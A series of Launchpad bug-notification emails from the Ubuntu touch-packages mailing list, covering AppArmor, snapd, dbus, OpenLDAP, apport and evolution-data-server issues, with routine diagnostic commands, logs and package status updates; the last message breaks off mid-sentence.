[Touch-packages] [Bug 1905493] Re: cloud-init status --wait hangs indefinitely in a nested lxd container
Due to a ping on IRC I wanted to summarize the situation here as it seems this still affects people. In nested LXD container we seem to have multiple issues: - apparmor service failing to start (might need to work with LXD to sort out why and how to fix it) - if it doesn't work at least fail to start more gracefully - comment 2 has a workaround to make dbus not insist on apparmor, but that is not a real fix we could generally apply - snapd snapd.seeded.service needs code to die/exit gracefully in this situation (as it won't work) - See comment 7, might have changed since then, but worth a revisit ** Also affects: lxd (Ubuntu) Importance: Undecided Status: New ** Summary changed: - cloud-init status --wait hangs indefinitely in a nested lxd container + Services (apparmor, snapd.seeded, ...?) fail to start in nested lxd container -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to dbus in Ubuntu. https://bugs.launchpad.net/bugs/1905493 Title: Services (apparmor, snapd.seeded, ...?) fail to start in nested lxd container Status in AppArmor: New Status in cloud-init: Invalid Status in snapd: Confirmed Status in dbus package in Ubuntu: Confirmed Status in lxd package in Ubuntu: New Status in systemd package in Ubuntu: Invalid Bug description: When booting a nested lxd container inside another lxd container (just a normal container, not a VM) (i.e. just L2), using cloud-init -status --wait, the "." is just printed off infinitely and never returns. To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1905493/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1951491] Re: Can't run snaps: .slice/session-1.scope is not a snap cgroup
Yes, based on your link this 'work around' disables new cgroups. : "If for some reason you need to keep the legacy cgroup v1 hierarchy, you can select it via a kernel parameter at boot time: systemd.unified_cgroup_hierarchy=0" however, it at least allows a working session. on another point: this problem happens with xubuntu which does not use gdm3, it uses lightdm. So what ever session start script is being missed by the standard startx scripts we are all using for our various remote connection tools, is not specific to gdm. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1951491 Title: Can't run snaps: .slice/session-1.scope is not a snap cgroup Status in snapd package in Ubuntu: Invalid Status in systemd package in Ubuntu: Confirmed Status in snapd package in Debian: New Bug description: I just upgraded from hirsute to impish using do-release-upgrade. On the upgraded system, I can't run either firefox or chromium (both of which worked fine under hirsute). Both fail with: /user.slice/user-NNN.slice/session-1.scope is not a snap cgroup where NNN is my uid With firefox, I was able to fix the problem with: snap remove --purge firefox apt purge firefox apt install firefox Now firefox works. But I tried the same thing substituting chromium- browser for firefox, and it didn't help: chromium fails with the same error message. I guess there must be something left over from the hirsute version of snapd that isn't getting noticed or cleared by the impish version? Someone suggested this might be related to bug 1850667, but that bug is marked fixed as of a couple months ago, and I just did this upgrade today. Also, it doesn't mention the error message I'm seeing. ProblemType: Bug DistroRelease: Ubuntu 21.10 Package: snapd 2.53+21.10ubuntu1 ProcVersionSignature: Ubuntu 5.13.0-21.21-generic 5.13.18 Uname: Linux 5.13.0-21-generic x86_64 ApportVersion: 2.20.11-0ubuntu71 Architecture: amd64 CasperMD5CheckResult: unknown Date: Thu Nov 18 18:12:45 2021 InstallationDate: Installed on 2020-04-29 (568 days ago) InstallationMedia: Ubuntu 20.04 LTS "Focal Fossa" - Release amd64 (20200423) SourcePackage: snapd UpgradeStatus: Upgraded to impish on 2021-11-18 (0 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/snapd/+bug/1951491/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1977627] Re: New upstream microrelease 2.5.12
** Description changed: [ Impact ] * MRE for the latest stable OpenLDAP 2.5.x release, 2.5.12. This update includes bugfixes only following the SRU policy exception defined at https://wiki.ubuntu.com/StableReleaseUpdates/OpenLDAPUpdates. [ Major Changes ] * See the list of bugs fixed in this release here: https://lists.openldap.org/hyperkitty/list/openldap- annou...@openldap.org/thread/LSEQKADYZFFMZJGPEVBRR3OVOY4IOGRA/ * In particular, this release includes the fix for CVE-2022-29155, but since the CVE has already been addressed by the currently OpenLDAP version in Jammy (2.5.11+dfsg-1~exp1ubuntu3.1), this does not classify as a security upload. [ Test Plan ] * Upstream gitlab pipeline results: https://git.openldap.org/openldap/openldap/-/pipelines/4298 * Upstream "call for testing": https://lists.openldap.org/hyperkitty/list/openldap- techni...@openldap.org/thread/5ZJEOQSVFQBG5TRLAAF6S5M3VRJH5IAV/ * As described in the MRE wiki page for OpenLDAP, the test plan is to build the package in bileto and make sure that (1) all build-time tests pass and (2) all autopkgtest runs (from reverse dependencies) also pass. * Build log (amd64) confirming that the build-time testsuite has been performed and completed successfully: - https://launchpadlibrarian.net/606268441/buildlog_ubuntu-jammy- - amd64.openldap_2.5.12+dfsg-1ubuntu0.22.04.1_BUILDING.txt.gz + https://launchpadlibrarian.net/606922528/buildlog_ubuntu-jammy- + amd64.openldap_2.5.12+dfsg-0ubuntu0.22.04.1_BUILDING.txt.gz + + * Bileto ticket: https://bileto.ubuntu.com/#/ticket/4868 [ Where problems could occur ] * Upstream tests are always executed during build-time. There are many reverse dependencies whose dep8 tests depend on OpenLDAP so the coverage is good. Nevertheless, there is always a risk for something to break since we are dealing with a microrelease upgrade. Whenever a test failure is detected, we will be on top of it and make sure it doesn't affect existing users. [ Other Info ] - * This is a reoccurring MRE. See below for previous MRE's links. + * This is a reoccurring MRE. See below for links to previous OpenLDAP + MREs. + * CVEs fixed by this release: - - CVE-2022-29155, which has already been addressed in Jammy + - CVE-2022-29155, which has already been addressed in Jammy. Current versions in supported releases that got updates: openldap | 2.5.11+dfsg-1~exp1ubuntu3.1 | jammy-updates | source Special cases: - None. Previous MREs for OpenLDAP: - None so far. As usual we test and prep from the PPA and then push through SRU/Security as applicable. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openldap in Ubuntu. https://bugs.launchpad.net/bugs/1977627 Title: New upstream microrelease 2.5.12 Status in openldap package in Ubuntu: New Status in openldap source package in Jammy: In Progress Bug description: [ Impact ] * MRE for the latest stable OpenLDAP 2.5.x release, 2.5.12. This update includes bugfixes only following the SRU policy exception defined at https://wiki.ubuntu.com/StableReleaseUpdates/OpenLDAPUpdates. [ Major Changes ] * See the list of bugs fixed in this release here: https://lists.openldap.org/hyperkitty/list/openldap- annou...@openldap.org/thread/LSEQKADYZFFMZJGPEVBRR3OVOY4IOGRA/ * In particular, this release includes the fix for CVE-2022-29155, but since the CVE has already been addressed by the currently OpenLDAP version in Jammy (2.5.11+dfsg-1~exp1ubuntu3.1), this does not classify as a security upload. [ Test Plan ] * Upstream gitlab pipeline results: https://git.openldap.org/openldap/openldap/-/pipelines/4298 * Upstream "call for testing": https://lists.openldap.org/hyperkitty/list/openldap- techni...@openldap.org/thread/5ZJEOQSVFQBG5TRLAAF6S5M3VRJH5IAV/ * As described in the MRE wiki page for OpenLDAP, the test plan is to build the package in bileto and make sure that (1) all build-time tests pass and (2) all autopkgtest runs (from reverse dependencies) also pass. * Build log (amd64) confirming that the build-time testsuite has been performed and completed successfully: https://launchpadlibrarian.net/606922528/buildlog_ubuntu-jammy- amd64.openldap_2.5.12+dfsg-0ubuntu0.22.04.1_BUILDING.txt.gz * Bileto ticket: https://bileto.ubuntu.com/#/ticket/4868 [ Where problems could occur ] * Upstream tests are always executed during build-time. There are many reverse dependencies whose dep8 tests depend on OpenLDAP so the coverage is good. Nevertheless, there is always a risk for something to break since we are dealing with a microrelease upgrade. Whenever a test failure is detected, we will be on top of it and make sure it doesn't affect existing users. [ Other Info ] * This is a reoccurring
[Touch-packages] [Bug 1008213] Re: Missing depends on whoopsie.
** Changed in: network-manager (Ubuntu) Importance: Undecided => Low ** Summary changed: - Missing depends on whoopsie. + whoopsie used in dbus config without depends -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to network-manager in Ubuntu. https://bugs.launchpad.net/bugs/1008213 Title: whoopsie used in dbus config without depends Status in network-manager package in Ubuntu: Confirmed Bug description: By depends I mean one of Suggests/Recommends/Depends. Currently, with no other changes, I'd say you need Depends. Thus I think you should change part of your package to accommodate for systems that don't have whoopsie installed. /etc/dbus-1/system.d/org.freedesktop.NetworkManager.conf:91: This leads to... arcadia:~# cat /var/log/upstart/dbus.log Unknown username "whoopsie" in message bus configuration file It's not an error and it doesn't break anything, but it should be easy for you to change things a little. One option is to create this user, though I'd coordinate that with the whoopsie developer. A perhaps better solution is to split this configuration out so that is will only be included if/when whoopsie is installed or the whoopsie user is available. Thank you. ProblemType: Bug DistroRelease: Ubuntu 12.04 Package: network-manager 0.9.4.0-0ubuntu4.1 ProcVersionSignature: Ubuntu 3.2.0-23.31-lowlatency-pae 3.2.14 Uname: Linux 3.2.0-23-lowlatency-pae i686 ApportVersion: 2.0.1-0ubuntu8 Architecture: i386 CRDA: Error: [Errno 2] No such file or directory Date: Sun Jun 3 15:05:40 2012 IpRoute: default via 192.168.172.100 dev eth2 metric 100 169.254.0.0/16 dev eth2 scope link metric 1000 192.168.172.0/24 dev eth2 proto kernel scope link src 192.168.172.26 IwConfig: Error: [Errno 2] No such file or directory NetDevice.eth2: Error: [Errno 2] No such file or directory X: INTERFACE_MAC=f4:6d:04:2c:0a:e1 NetDevice.lo: Error: [Errno 2] No such file or directory X: INTERFACE_MAC=00:00:00:00:00:00 NetworkManager.state: [main] NetworkingEnabled=false WirelessEnabled=true WWANEnabled=false RfKill: Error: [Errno 2] No such file or directory SourcePackage: network-manager UpgradeStatus: Upgraded to precise on 2012-01-03 (152 days ago) WpaSupplicantLog: nmcli-con: NAME UUID TYPE TIMESTAMPTIMESTAMP-REAL AUTOCONNECT READONLY DBUS-PATH Auto eth8 759a3094-00a2-4699-bcb0-99d4662887a6 802-3-ethernet0never no no /org/freedesktop/NetworkManager/Settings/0 nmcli-dev: DEVICE TYPE STATE DBUS-PATH eth2 802-3-ethernetunmanaged /org/freedesktop/NetworkManager/Devices/0 nmcli-nm: RUNNING VERSIONSTATE NET-ENABLED WIFI-HARDWARE WIFI WWAN-HARDWARE WWAN running 0.9.4.0asleep disabled enabled enabledenabled disabled To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/1008213/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1814302] Re: Quasselcore apparmor profile issue in lxd container.
I've proposed the change to Debian: https://salsa.debian.org/sdeziel- guest/quassel/-/merge_requests/1 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1814302 Title: Quasselcore apparmor profile issue in lxd container. Status in AppArmor: Invalid Status in apparmor package in Ubuntu: Invalid Status in quassel package in Ubuntu: Confirmed Status in apparmor source package in Bionic: Invalid Status in quassel source package in Bionic: Fix Released Status in apparmor source package in Focal: Invalid Status in quassel source package in Focal: Fix Released Status in apparmor source package in Groovy: Invalid Status in quassel source package in Groovy: Fix Released Status in apparmor source package in Jammy: Invalid Status in quassel source package in Jammy: Confirmed Status in apparmor source package in Kinetic: Invalid Status in quassel source package in Kinetic: Confirmed Bug description: [impact] quasselcore cannot start inside lxd container [test case] create lxd container, install quassel-core, check quasselcore service: $ systemctl status quasselcore ● quasselcore.service - distributed IRC client using a central core component Loaded: loaded (/lib/systemd/system/quasselcore.service; enabled; vendor preset: enabled) Active: failed (Result: signal) since Tue 2020-06-30 18:32:40 UTC; 4s ago Docs: man:quasselcore(1) Process: 3853 ExecStart=/usr/bin/quasselcore --configdir=${DATADIR} --logfile=${LOGFILE} --loglevel=${LOGLEVEL} --port=${PORT} --listen=${LISTEN} (code=killed, signal=SEGV) Main PID: 3853 (code=killed, signal=SEGV) Jun 30 18:32:40 lp1814302-f systemd[1]: quasselcore.service: Scheduled restart job, restart counter is at 7. Jun 30 18:32:40 lp1814302-f systemd[1]: Stopped distributed IRC client using a central core component. Jun 30 18:32:40 lp1814302-f systemd[1]: quasselcore.service: Start request repeated too quickly. Jun 30 18:32:40 lp1814302-f systemd[1]: quasselcore.service: Failed with result 'signal'. Jun 30 18:32:40 lp1814302-f systemd[1]: Failed to start distributed IRC client using a central core component. Also, the binary will segfault when run directly due to apparmor denials: $ /usr/bin/quasselcore Segmentation fault [760149.590802] audit: type=1400 audit(1593542073.962:1058): apparmor="DENIED" operation="file_mmap" namespace="root//lxd- lp1814302-f_" profile="/usr/bin/quasselcore" name="/usr/bin/quasselcore" pid=2006430 comm="quasselcore" requested_mask="r" denied_mask="r" fsuid=1000110 ouid=100 [regression potential] this expands the apparmor profile, so any regression would likely involve problems while starting due to apparmor. [scope] this is needed for b/f/g. this is also needed for e, but that is EOL in weeks and this is not important enough to bother there. [original description] Fresh install of Ubuntu 18.04. lxd installed from snap. Fresh 18.04 container. Everything up todate via apt. Install quassel-core. Service will not start. Set "aa-complain /usr/bin/quasselcore" allows quasselcore to start. I then added "/usr/bin/quasselcore rm," to "/etc/apparmor.d/usr.bin.quasselcore". Set "aa-enforce /usr/bin/quasselcore". Restarted main host. Quasselcore service now starts and I can connect to it. To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1814302/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1905493] Re: cloud-init status --wait hangs indefinitely in a nested lxd container
Status changed to 'Confirmed' because the bug affects multiple users. ** Changed in: dbus (Ubuntu) Status: New => Confirmed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to dbus in Ubuntu. https://bugs.launchpad.net/bugs/1905493 Title: cloud-init status --wait hangs indefinitely in a nested lxd container Status in AppArmor: New Status in cloud-init: Invalid Status in snapd: Confirmed Status in dbus package in Ubuntu: Confirmed Status in systemd package in Ubuntu: Invalid Bug description: When booting a nested lxd container inside another lxd container (just a normal container, not a VM) (i.e. just L2), using cloud-init -status --wait, the "." is just printed off infinitely and never returns. To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1905493/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1008213] Re: Missing depends on whoopsie.
This bug still persists. Ubuntu MATE 20.04.4, network-manager 1.22.10-1ubuntu2.3 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to network-manager in Ubuntu. https://bugs.launchpad.net/bugs/1008213 Title: Missing depends on whoopsie. Status in network-manager package in Ubuntu: Confirmed Bug description: By depends I mean one of Suggests/Recommends/Depends. Currently, with no other changes, I'd say you need Depends. Thus I think you should change part of your package to accommodate for systems that don't have whoopsie installed. /etc/dbus-1/system.d/org.freedesktop.NetworkManager.conf:91: This leads to... arcadia:~# cat /var/log/upstart/dbus.log Unknown username "whoopsie" in message bus configuration file It's not an error and it doesn't break anything, but it should be easy for you to change things a little. One option is to create this user, though I'd coordinate that with the whoopsie developer. A perhaps better solution is to split this configuration out so that is will only be included if/when whoopsie is installed or the whoopsie user is available. Thank you. ProblemType: Bug DistroRelease: Ubuntu 12.04 Package: network-manager 0.9.4.0-0ubuntu4.1 ProcVersionSignature: Ubuntu 3.2.0-23.31-lowlatency-pae 3.2.14 Uname: Linux 3.2.0-23-lowlatency-pae i686 ApportVersion: 2.0.1-0ubuntu8 Architecture: i386 CRDA: Error: [Errno 2] No such file or directory Date: Sun Jun 3 15:05:40 2012 IpRoute: default via 192.168.172.100 dev eth2 metric 100 169.254.0.0/16 dev eth2 scope link metric 1000 192.168.172.0/24 dev eth2 proto kernel scope link src 192.168.172.26 IwConfig: Error: [Errno 2] No such file or directory NetDevice.eth2: Error: [Errno 2] No such file or directory X: INTERFACE_MAC=f4:6d:04:2c:0a:e1 NetDevice.lo: Error: [Errno 2] No such file or directory X: INTERFACE_MAC=00:00:00:00:00:00 NetworkManager.state: [main] NetworkingEnabled=false WirelessEnabled=true WWANEnabled=false RfKill: Error: [Errno 2] No such file or directory SourcePackage: network-manager UpgradeStatus: Upgraded to precise on 2012-01-03 (152 days ago) WpaSupplicantLog: nmcli-con: NAME UUID TYPE TIMESTAMPTIMESTAMP-REAL AUTOCONNECT READONLY DBUS-PATH Auto eth8 759a3094-00a2-4699-bcb0-99d4662887a6 802-3-ethernet0never no no /org/freedesktop/NetworkManager/Settings/0 nmcli-dev: DEVICE TYPE STATE DBUS-PATH eth2 802-3-ethernetunmanaged /org/freedesktop/NetworkManager/Devices/0 nmcli-nm: RUNNING VERSIONSTATE NET-ENABLED WIFI-HARDWARE WIFI WWAN-HARDWARE WWAN running 0.9.4.0asleep disabled enabled enabledenabled disabled To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/1008213/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1978487] [NEW] attach_journal_errors is create a ValueError crash
Public bug reported: As seen in https://bugs.launchpad.net/ubuntu/+source/obs- studio/+bug/1978414 with ApportVersion: 2.21.0-0ubuntu2. Traceback (most recent call last): File "/usr/lib/python3/dist-packages/apport/report.py", line 205, in _run_hook symb['add_info'](report, ui) File "/usr/share/apport/general-hooks/generic.py", line 94, in add_info apport.hookutils.attach_journal_errors(report) File "/usr/lib/python3/dist-packages/apport/hookutils.py", line 740, in attach_journal_errors crash_time = report.get_date() File "/usr/lib/python3/dist-packages/problem_report.py", line 268, in get_date return datetime.datetime.strptime(self['Date'], '%a %b %d %H:%M:%S %Y') File "/usr/lib/python3.10/_strptime.py", line 568, in _strptime_datetime tt, fraction, gmtoff_fraction = _strptime(data_string, format) File "/usr/lib/python3.10/_strptime.py", line 349, in _strptime raise ValueError("time data %r does not match format %r" % ValueError: time data 'Sun Jun 12 19:52:55 2022' does not match format '%a %b %d %H:%M:%S %Y' ** Affects: apport (Ubuntu) Importance: Undecided Status: New ** Tags: rls-kk-incoming ** Tags added: rls-kk-incoming -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apport in Ubuntu. https://bugs.launchpad.net/bugs/1978487 Title: attach_journal_errors is create a ValueError crash Status in apport package in Ubuntu: New Bug description: As seen in https://bugs.launchpad.net/ubuntu/+source/obs- studio/+bug/1978414 with ApportVersion: 2.21.0-0ubuntu2. Traceback (most recent call last): File "/usr/lib/python3/dist-packages/apport/report.py", line 205, in _run_hook symb['add_info'](report, ui) File "/usr/share/apport/general-hooks/generic.py", line 94, in add_info apport.hookutils.attach_journal_errors(report) File "/usr/lib/python3/dist-packages/apport/hookutils.py", line 740, in attach_journal_errors crash_time = report.get_date() File "/usr/lib/python3/dist-packages/problem_report.py", line 268, in get_date return datetime.datetime.strptime(self['Date'], '%a %b %d %H:%M:%S %Y') File "/usr/lib/python3.10/_strptime.py", line 568, in _strptime_datetime tt, fraction, gmtoff_fraction = _strptime(data_string, format) File "/usr/lib/python3.10/_strptime.py", line 349, in _strptime raise ValueError("time data %r does not match format %r" % ValueError: time data 'Sun Jun 12 19:52:55 2022' does not match format '%a %b %d %H:%M:%S %Y' To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1978487/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1972115] Re: ubuntu-bug exits after dialog instead of sending data
** Also affects: apport Importance: Undecided Status: New ** Changed in: apport Milestone: None => 2.22.0 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apport in Ubuntu. https://bugs.launchpad.net/bugs/1972115 Title: ubuntu-bug exits after dialog instead of sending data Status in Apport: New Status in apport package in Ubuntu: Confirmed Status in apport source package in Jammy: Confirmed Status in apport source package in Kinetic: Confirmed Bug description: After a gnome-shell crash, I am trying to manually submit it by running 'ubuntu-bug /var/crash/_usr_bin_gnome-shell.1000.crash'. This results in an apport-gtk prompt asking me "Send problem report to the developers?" When I click 'send', the dialog disappears and ubuntu- bug exits, without uploading data to launchpad or interfacing with the browser. To manage notifications about this bug go to: https://bugs.launchpad.net/apport/+bug/1972115/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1951491] Re: Can't run snaps: .slice/session-1.scope is not a snap cgroup
@tim-ruchardson unified_cgroup_hierarchy=1 is exactly what I want to enable, and I reported the problem in #1956942, where there is a reference to https://lists.ubuntu.com/archives/ubuntu- devel/2021-August/041598.html the default is hierarchy=unified. Also, in my configuration docker is using systemd, and it works, but snapd does not work. It does not look like a work around, but like a "let it be and do not use cgroupv2" -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1951491 Title: Can't run snaps: .slice/session-1.scope is not a snap cgroup Status in snapd package in Ubuntu: Invalid Status in systemd package in Ubuntu: Confirmed Status in snapd package in Debian: New Bug description: I just upgraded from hirsute to impish using do-release-upgrade. On the upgraded system, I can't run either firefox or chromium (both of which worked fine under hirsute). Both fail with: /user.slice/user-NNN.slice/session-1.scope is not a snap cgroup where NNN is my uid With firefox, I was able to fix the problem with: snap remove --purge firefox apt purge firefox apt install firefox Now firefox works. But I tried the same thing substituting chromium- browser for firefox, and it didn't help: chromium fails with the same error message. I guess there must be something left over from the hirsute version of snapd that isn't getting noticed or cleared by the impish version? Someone suggested this might be related to bug 1850667, but that bug is marked fixed as of a couple months ago, and I just did this upgrade today. Also, it doesn't mention the error message I'm seeing. ProblemType: Bug DistroRelease: Ubuntu 21.10 Package: snapd 2.53+21.10ubuntu1 ProcVersionSignature: Ubuntu 5.13.0-21.21-generic 5.13.18 Uname: Linux 5.13.0-21-generic x86_64 ApportVersion: 2.20.11-0ubuntu71 Architecture: amd64 CasperMD5CheckResult: unknown Date: Thu Nov 18 18:12:45 2021 InstallationDate: Installed on 2020-04-29 (568 days ago) InstallationMedia: Ubuntu 20.04 LTS "Focal Fossa" - Release amd64 (20200423) SourcePackage: snapd UpgradeStatus: Upgraded to impish on 2021-11-18 (0 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/snapd/+bug/1951491/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1978476] Re: Incorrect UNTIL recurrence with midnight start
Thank you for the bug report, upstreamed fixed it for 3.44.3+ so it will be fixed in Ubuntu when that version lands ** Changed in: evolution-data-server (Ubuntu) Importance: Undecided => Low ** Changed in: evolution-data-server (Ubuntu) Status: New => Triaged ** Changed in: evolution-data-server (Ubuntu) Status: Triaged => Fix Committed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to evolution-data-server in Ubuntu. https://bugs.launchpad.net/bugs/1978476 Title: Incorrect UNTIL recurrence with midnight start Status in evolution-data-server package in Ubuntu: Fix Committed Bug description: EDS generates instances for recurring events starting at midnight with an UNTIL date incorrectly. Specifically, using e_cal_client_generate_instances() or e_cal_recur_generate_instances_sync() generates an instance one day after the UNTIL date. This bug was introduced with the migration to libical-glib and libecal-2.0, so this affects bot focal and jammy. It was fixed with commit 3969303e (master) and 7fb64814 (gnome-42) which will be part of the 3.45.1+ and 3.44.3+ releases respectively. Upstream bug report: https://gitlab.gnome.org/GNOME/evolution-data- server/-/issues/393 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evolution-data-server/+bug/1978476/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1814302] Re: Quasselcore apparmor profile issue in lxd container.
I've sponsored/uploaded both the Jammy and Kinetic debdiffs. Kinetic is accepted, jammy-proposed has to go through SRU. Removing Sponsors as there is nothing more to sponsor here. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1814302 Title: Quasselcore apparmor profile issue in lxd container. Status in AppArmor: Invalid Status in apparmor package in Ubuntu: Invalid Status in quassel package in Ubuntu: Confirmed Status in apparmor source package in Bionic: Invalid Status in quassel source package in Bionic: Fix Released Status in apparmor source package in Focal: Invalid Status in quassel source package in Focal: Fix Released Status in apparmor source package in Groovy: Invalid Status in quassel source package in Groovy: Fix Released Status in apparmor source package in Jammy: Invalid Status in quassel source package in Jammy: Confirmed Status in apparmor source package in Kinetic: Invalid Status in quassel source package in Kinetic: Confirmed Bug description: [impact] quasselcore cannot start inside lxd container [test case] create lxd container, install quassel-core, check quasselcore service: $ systemctl status quasselcore ● quasselcore.service - distributed IRC client using a central core component Loaded: loaded (/lib/systemd/system/quasselcore.service; enabled; vendor preset: enabled) Active: failed (Result: signal) since Tue 2020-06-30 18:32:40 UTC; 4s ago Docs: man:quasselcore(1) Process: 3853 ExecStart=/usr/bin/quasselcore --configdir=${DATADIR} --logfile=${LOGFILE} --loglevel=${LOGLEVEL} --port=${PORT} --listen=${LISTEN} (code=killed, signal=SEGV) Main PID: 3853 (code=killed, signal=SEGV) Jun 30 18:32:40 lp1814302-f systemd[1]: quasselcore.service: Scheduled restart job, restart counter is at 7. Jun 30 18:32:40 lp1814302-f systemd[1]: Stopped distributed IRC client using a central core component. Jun 30 18:32:40 lp1814302-f systemd[1]: quasselcore.service: Start request repeated too quickly. Jun 30 18:32:40 lp1814302-f systemd[1]: quasselcore.service: Failed with result 'signal'. Jun 30 18:32:40 lp1814302-f systemd[1]: Failed to start distributed IRC client using a central core component. Also, the binary will segfault when run directly due to apparmor denials: $ /usr/bin/quasselcore Segmentation fault [760149.590802] audit: type=1400 audit(1593542073.962:1058): apparmor="DENIED" operation="file_mmap" namespace="root//lxd- lp1814302-f_" profile="/usr/bin/quasselcore" name="/usr/bin/quasselcore" pid=2006430 comm="quasselcore" requested_mask="r" denied_mask="r" fsuid=1000110 ouid=100 [regression potential] this expands the apparmor profile, so any regression would likely involve problems while starting due to apparmor. [scope] this is needed for b/f/g. this is also needed for e, but that is EOL in weeks and this is not important enough to bother there. [original description] Fresh install of Ubuntu 18.04. lxd installed from snap. Fresh 18.04 container. Everything up todate via apt. Install quassel-core. Service will not start. Set "aa-complain /usr/bin/quasselcore" allows quasselcore to start. I then added "/usr/bin/quasselcore rm," to "/etc/apparmor.d/usr.bin.quasselcore". Set "aa-enforce /usr/bin/quasselcore". Restarted main host. Quasselcore service now starts and I can connect to it. To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1814302/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1814302] Re: Quasselcore apparmor profile issue in lxd container.
** Patch added: "1-1814301-jammy.debdiff" https://bugs.launchpad.net/ubuntu/jammy/+source/quassel/+bug/1814302/+attachment/5597063/+files/1-1814301-jammy.debdiff -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1814302 Title: Quasselcore apparmor profile issue in lxd container. Status in AppArmor: Invalid Status in apparmor package in Ubuntu: Invalid Status in quassel package in Ubuntu: Confirmed Status in apparmor source package in Bionic: Invalid Status in quassel source package in Bionic: Fix Released Status in apparmor source package in Focal: Invalid Status in quassel source package in Focal: Fix Released Status in apparmor source package in Groovy: Invalid Status in quassel source package in Groovy: Fix Released Status in apparmor source package in Jammy: Invalid Status in quassel source package in Jammy: Confirmed Status in apparmor source package in Kinetic: Invalid Status in quassel source package in Kinetic: Confirmed Bug description: [impact] quasselcore cannot start inside lxd container [test case] create lxd container, install quassel-core, check quasselcore service: $ systemctl status quasselcore ● quasselcore.service - distributed IRC client using a central core component Loaded: loaded (/lib/systemd/system/quasselcore.service; enabled; vendor preset: enabled) Active: failed (Result: signal) since Tue 2020-06-30 18:32:40 UTC; 4s ago Docs: man:quasselcore(1) Process: 3853 ExecStart=/usr/bin/quasselcore --configdir=${DATADIR} --logfile=${LOGFILE} --loglevel=${LOGLEVEL} --port=${PORT} --listen=${LISTEN} (code=killed, signal=SEGV) Main PID: 3853 (code=killed, signal=SEGV) Jun 30 18:32:40 lp1814302-f systemd[1]: quasselcore.service: Scheduled restart job, restart counter is at 7. Jun 30 18:32:40 lp1814302-f systemd[1]: Stopped distributed IRC client using a central core component. Jun 30 18:32:40 lp1814302-f systemd[1]: quasselcore.service: Start request repeated too quickly. Jun 30 18:32:40 lp1814302-f systemd[1]: quasselcore.service: Failed with result 'signal'. Jun 30 18:32:40 lp1814302-f systemd[1]: Failed to start distributed IRC client using a central core component. Also, the binary will segfault when run directly due to apparmor denials: $ /usr/bin/quasselcore Segmentation fault [760149.590802] audit: type=1400 audit(1593542073.962:1058): apparmor="DENIED" operation="file_mmap" namespace="root//lxd- lp1814302-f_" profile="/usr/bin/quasselcore" name="/usr/bin/quasselcore" pid=2006430 comm="quasselcore" requested_mask="r" denied_mask="r" fsuid=1000110 ouid=100 [regression potential] this expands the apparmor profile, so any regression would likely involve problems while starting due to 